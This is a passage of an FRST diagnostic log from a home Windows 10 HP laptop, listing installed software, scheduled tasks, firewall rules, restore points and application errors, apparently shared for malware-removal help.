Intel® Dynamic Platform and Thermal Framework (HKLM-x32\...\{654EE65D-FAA4-4EA6-8C07-DC94E6A304D4}) (Version: 8.1.10608.329 - Intel Corporation)
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.2.1183 - Intel Corporation)
Intel® PRO/Wireless Driver (HKLM\...\{edcc2d98-dba0-4914-ba46-6dae7352cea9}) (Version: 19.20.0000.5007 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4454 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.8.0.1042 - Intel Corporation)
Intel® WiDi (HKLM\...\{6B15F1EF-F3A8-4C29-BF9E-18EB3683A83D}) (Version: 6.0.60.0 - Intel Corporation)
Intel® WiDi Software Asset Manager (x32 Version: 3.2.1184 - Intel Corporation) Hidden
Intel® Wireless Bluetooth® (HKLM-x32\...\{3920BCB0-23AA-4D0D-93E5-404692DAF9D2}) (Version: 19.00.1621.3340 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{d5572863-793c-4ec8-872a-43cccc68b948}) (Version: 18.40.0 - Intel Corporation)
Jewel Match Snowscapes (x32 Version: 3.0.2.118 - WildTangent) Hidden
Little Boy: Walter's Scooter (x32 Version: 3.0.2.59 - WildTangent) Hidden
Lost Souls: Timeless Fables Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
Magic Heroes: Save Our Park (x32 Version: 3.0.2.59 - WildTangent) Hidden
Malwarebytes version 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
Manor Memoirs Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 16.0.7571.2109 - Microsoft Corporation)
Microsoft Office Home and Student 2010 (HKLM\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\OneDriveSetup.exe) (Version: 17.3.6743.1212 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23918 (HKLM-x32\...\{2e085fd2-a3e4-4b39-8e10-6b8d35f55244}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Mozilla Firefox 51.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 51.0.1 (x86 en-US)) (Version: 51.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 51.0.1 - Mozilla)
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
Online Plug-in (x32 Version: 14.5.0.10018 - Citrix Systems, Inc.) Hidden
Plagiarii (x32 Version: 3.0.2.59 - WildTangent) Hidden
Polar Bowler 1st Frame (x32 Version: 3.0.2.59 - WildTangent) Hidden
PuppetShow: Return to Joyville (x32 Version: 3.0.2.126 - WildTangent) Hidden
Pyro Jump (x32 Version: 3.0.2.59 - WildTangent) Hidden
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10586.21287 - Realtek Semiconduct Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.6.1001.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8004 - Realtek Semiconductor Corp.)
Regency Solitaire (x32 Version: 3.0.2.126 - WildTangent) Hidden
Runefall (x32 Version: 3.0.2.126 - WildTangent) Hidden
Rush Hour! Gas Station (x32 Version: 3.0.2.59 - WildTangent) Hidden
Self-service Plug-in (x32 Version: 4.5.0.14155 - Citrix Systems, Inc.) Hidden
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version: - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (Version: - Microsoft) Hidden
Sky High Farm (x32 Version: 3.0.2.59 - WildTangent) Hidden
Skype™ 7.31 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.31.104 - Skype Technologies S.A.)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics ClickPad Driver (HKLM\...\SynTPDeinstKey) (Version: 19.3.11.37 - Synaptics Incorporated)
Tasty Blue (x32 Version: 3.0.2.59 - WildTangent) Hidden
The Far Kingdoms (x32 Version: 1.1.2.4 - WildTangent) Hidden
TurboTax 2016 (HKLM-x32\...\TurboTax 2016) (Version: 2016.0 - Intuit, Inc)
Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
UserTesting (HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\UserTestingPlugin) (Version: - UserTesting.com)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.1.0.28 - WildTangent)
WildTangent Games App for HP (x32 Version: 4.1.1.2 - WildTangent) Hidden
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-2731509489-3924948741-1415746157-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {00DA6CEA-186D-4563-AC42-5D9024D5EE93} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-04] (Dropbox, Inc.)
Task: {020EC6C1-8FC5-4E00-8AA3-DEEFEF76BC4F} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe
Task: {02741E5B-6CB0-4785-8138-B76C8FFECD36} - System32\Tasks\AdobeAAMUpdater-1.0-LAPTOP-Q6I7UJ7H-Joseph => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)
Task: {037E6CC1-F2A7-4570-94C3-34EFFF7FEF81} - System32\Tasks\HPCeeScheduleForJoseph => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2016-01-22] (Hewlett-Packard)
Task: {0D314300-9FF5-4A1E-8A6E-02DAC03B2F5A} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-12-28] (Microsoft Corporation)
Task: {28815AC6-2D9D-4DB2-9B9B-C15782F58F17} - System32\Tasks\IntelWiDi-Upgrade-91ba0caa-28a7-4f47-8d08-f71b4b10fbec => C:\Program Files (x86)\Intel Corporation\Intel WiDi\Intel® Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [2015-09-17] (Intel Corporation)
Task: {2B726BAB-E9B6-4B18-A788-E1550EBC27D3} - System32\Tasks\HPCustParticipation HP Photosmart 6520 series => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPCustPartic.exe [2012-10-17] (Hewlett-Packard Co.)
Task: {2CA50760-ECC6-4AE8-ABC0-7786D4ABD805} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\WatchDog.exe [2016-10-21] (Bitdefender)
Task: {31E6B1DE-6E6C-4EC4-BF0D-F5B3822B798F} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
Task: {334761BD-5E77-4258-B1B3-3EBE4E9225C0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-12-21] (HP Inc.)
Task: {49F9DD57-0D8B-44AC-B3D2-0E9318CE1D6F} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-12-28] (Microsoft Corporation)
Task: {4A95B853-DC77-486C-853C-03F94CAE8DE7} - System32\Tasks\Intel\Intel Telemetry 2 => C:\Program Files\Intel\Telemetry 2.0\lrio.exe [2015-06-05] (Intel Corporation)
Task: {56B055C5-6236-4075-A0A4-E2627BB3183B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-22] (Google Inc.)
Task: {5C39963E-E07B-4DD3-BE48-6B43D7E7C731} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
Task: {5F53EEE8-4920-4181-806B-2DE65B82BAD7} - System32\Tasks\{832C82D8-6868-4CD7-AF1B-10388CE0E534} => Chrome.exe hxxp://ui.skype.com/ui/0/7.27.0.101/en/abandoninstall?source=lightinstaller&page=tsInstall
Task: {6EEBD8FF-375F-4F22-AA35-1697FE268304} - System32\Tasks\HP\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\HP\HP CoolSense\CoolSense.exe [2016-01-21] (HP Development Company, L.P.)
Task: {794EC38E-0A13-4104-86A7-8F27C70DA1BB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
Task: {7A53628B-0D5A-4368-AD0B-4DF307943007} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
Task: {891256ED-2188-45B6-9656-46B60828F7EB} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Joseph\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
Task: {89D2A8B6-4765-4DCA-85AD-7596FECFB286} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
Task: {8EBEC732-67C6-4823-8F6D-D49219079BB5} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-04] (Dropbox, Inc.)
Task: {963EEFD3-C066-4DFC-B419-A76DB6073FFB} - System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe [2017-01-03] (Bitdefender)
Task: {9F965779-1CB2-4D42-BC03-7B29DC26B7B7} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_TH45U581RP => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
Task: {A6F5043F-81F4-4E57-B0B6-BF0997939F31} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-22] (Google Inc.)
Task: {AE327D73-DB64-440F-9FF4-02DC16AA63C0} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-11-07] (HP Inc.)
Task: {B25BDC00-270D-45CD-8FF5-1E12386E6D52} - System32\Tasks\HPDAS => C:\Program [Argument = Files\HP\HP ePrint\HP.DeliveryAndStatus.Desktop.App.exe /CheckJobs]
Task: {B787AC15-AED2-454D-A6A1-3EDF53CA38BA} - System32\Tasks\IntelWiDi-Upgrade-91ba0caa-28a7-4f47-8d08-f71b4b10fbec-Logon => C:\Program Files (x86)\Intel Corporation\Intel WiDi\Intel® Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [2015-09-17] (Intel Corporation)
Task: {BB173364-607B-493A-935B-E5D7832968E5} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-01-28] (AVAST Software)
Task: {E5AF5C26-359C-43CC-BF3F-29807CD26CDD} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [2016-04-04] ()
Task: {EF0F5F72-921B-416D-89FD-4102E543E277} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [2016-12-15] (HP Inc.)
Task: {F3EA5147-1530-4527-9731-26F30F8AE0E1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.)
Task: {F4CC15E9-94C3-43C0-A478-E0AE034F0175} - System32\Tasks\Intel PTT EK Recertification => C:\Program Files\Intel\iCLS Client\IntelPTTEKRecertification.exe [2016-01-14] (Intel® Corporation)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\HPCeeScheduleForJoseph.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Priceline.com.lnk -> C:\Program Files (x86)\HP\Shared\WizLink.exe () -> hxxp://www.priceline.com/?refid=PLHBC6240OPQ&refclickid=square
==================== Loaded Modules (Whitelisted) ==============
2016-07-16 06:42 - 2016-07-16 06:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-12-13 20:34 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2017-02-01 08:44 - 2013-09-03 14:29 - 00111832 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\bdmetrics.dll
2017-02-01 08:44 - 2016-11-14 16:52 - 01008448 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttpbr.mdl
2017-02-01 08:44 - 2016-11-14 16:52 - 00541952 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttpdsp.mdl
2017-02-01 08:44 - 2016-11-14 16:52 - 03202816 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttpph.mdl
2017-02-01 08:44 - 2016-11-14 16:52 - 01542976 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttprbl.mdl
2016-12-13 20:34 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-10-25 09:57 - 2016-10-25 09:57 - 00491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2016-04-01 13:57 - 2016-12-28 12:03 - 08924864 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll
2016-08-06 14:07 - 2014-04-14 20:59 - 00389896 _____ () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
2017-01-10 17:37 - 2017-01-20 07:47 - 02264352 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
2017-01-10 17:37 - 2017-01-20 07:47 - 02254800 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2017-01-10 17:37 - 2017-01-20 07:47 - 02829776 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\arwlib.dll
2016-09-29 12:48 - 2016-09-29 12:48 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-01-10 22:47 - 2016-12-21 02:09 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-02-01 08:44 - 2017-01-13 13:51 - 00023328 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\lang\en-us\bdsystray.txtui
2017-01-10 22:45 - 2016-12-21 01:54 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-01-10 22:45 - 2016-12-21 01:48 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-01-10 22:45 - 2016-12-21 01:48 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-01-10 22:45 - 2016-12-21 01:48 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2017-01-10 22:45 - 2016-12-21 01:48 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-01-10 22:46 - 2016-12-21 01:53 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\Users\Joseph\Downloads\AdwCleaner.exe:BDU [0]
AlternateDataStreams: C:\Users\Joseph\Downloads\Firefox Setup Stub 51.0.1.exe:BDU [0]
AlternateDataStreams: C:\Users\Joseph\Downloads\FRST64.exe:BDU [0]
AlternateDataStreams: C:\Users\Joseph\Downloads\JRT (1).exe:BDU [0]
AlternateDataStreams: C:\Users\Joseph\Downloads\JRT.exe:BDU [0]
AlternateDataStreams: C:\Users\Joseph\Downloads\mb3-setup-cb.NT-3.0.6.1469.exe:BDU [0]
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="Service"
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2015-10-30 02:24 - 2017-02-01 21:28 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\Control Panel\Desktop\\Wallpaper -> C:\windows\web\wallpaper\Hewlett-Packard Backgrounds\backgroundDefault.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [vm-monitoring-nb-session] => LPort=139
FirewallRules: [{0308E923-8487-403F-B445-D15ED8CCCB95}] => C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVD Cinema\PowerDVDCinema.exe
FirewallRules: [{E42A29D0-C19D-4D1C-8FE2-D850981AEBA8}] => C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVDMovie.exe
FirewallRules: [{29F940E0-B1B5-45D6-9E75-4BECF8FB67FC}] => C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD14Agent.exe
FirewallRules: [{B3262CE0-7120-40CC-B8E9-77C75A53DBCA}] => C:\Program Files (x86)\CyberLink\PowerDVD14\Kernel\DMS\CLMSServerPDVD14.exe
FirewallRules: [{F580D45B-9B87-4478-9D02-4FB5710B4EE2}] => C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD.exe
FirewallRules: [{6C97C639-83FE-4D5D-A976-D178E54ACEBA}] => C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{D49EDF57-C52E-467F-A056-63D5BD0738D7}] => C:\Program Files\Intel Corporation\Intel WiDi\SmartAgentTest.exe
FirewallRules: [{261EA2B7-45BC-4067-83D5-2418ADCEE9C8}] => C:\Program Files\Intel Corporation\Intel WiDi\Next\WirelessDisplay.exe
FirewallRules: [{B59EE6A4-D725-4298-9685-DFD41B59B982}] => C:\Program Files\Intel Corporation\Intel WiDi\WiDiAppOld.exe
FirewallRules: [{CF4CA95C-09CF-4959-9D76-68426CDA477D}] => C:\Program Files\Intel Corporation\Intel WiDi\WiDiApp.exe
FirewallRules: [{080A3C37-1740-4E2C-815C-189C744E6E60}] => c:\Program Files\CyberLink\PowerDirector12\PDR10.EXE
FirewallRules: [{A9134569-28FB-4867-B6F4-AA1D2E5E15EE}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{0334F46F-ABB7-4487-AA0B-5C39528FE3FC}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{A0CD17AF-60E5-44AE-AC27-9328A673AC89}] => C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{970594D0-4429-4C70-838A-D147ED3FC01F}] => C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{DBA71186-0545-49C3-8B27-EF841C1940ED}] => C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{EA52B792-A898-4EF8-AD47-E12D2BF5BD0A}] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\DeviceSetup.exe
FirewallRules: [{A89935E6-6E46-4459-BA52-726242012FAF}] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPNetworkCommunicator.exe
FirewallRules: [{2C60681B-0038-4452-ADDE-3FC15C74708A}] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [{0790D2E9-EA09-4D41-BA01-B8BC78ECD5DA}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{DDE9F5AC-0598-494C-89AB-659FD2D18BBB}] => C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [{C5ABB8F3-9C6A-48E2-9E61-D7DFAF7B05F7}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
FirewallRules: [{D4F608B2-F97B-4617-8A32-8CEA999C5E3D}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{C23C9D12-7310-4478-8E06-5C73C5D2AC72}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{F04FC8DC-884B-4DD1-8B0B-79F29AED26C0}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{009CC8D2-7203-4597-901D-185455F173D9}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{5151A207-2082-465F-96EB-697F284CEFD2}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{A75B0F26-5FC7-48B3-8D4D-90756AE6443A}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{80B7AC85-64A5-4029-9123-68203C3004D3}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
==================== Restore Points =========================
15-01-2017 15:43:24 Installed TurboTax 2016 wrapper
24-01-2017 15:52:44 Scheduled Checkpoint
31-01-2017 20:53:13 end January 2017
01-02-2017 17:15:49 JRT Pre-Junkware Removal
01-02-2017 17:24:34 JRT Pre-Junkware Removal
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (02/01/2017 09:23:19 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
Description: Package Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy+CortanaUI was terminated because it took too long to suspend.
Error: (02/01/2017 09:20:30 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
Description: Package Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy+CortanaUI was terminated because it took too long to suspend.
Error: (02/01/2017 09:18:22 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: IntelCpHDCPSvc.exe, version: 1.0.0.1, time stamp: 0x572a4b65
Faulting module name: ntdll.dll, version: 10.0.14393.479, time stamp: 0x5825887f
Exception code: 0xc0000005
Fault offset: 0x000000000002f7db
Faulting process id: 0xd20
Faulting application start time: 0x01d27cfa9f3c35eb
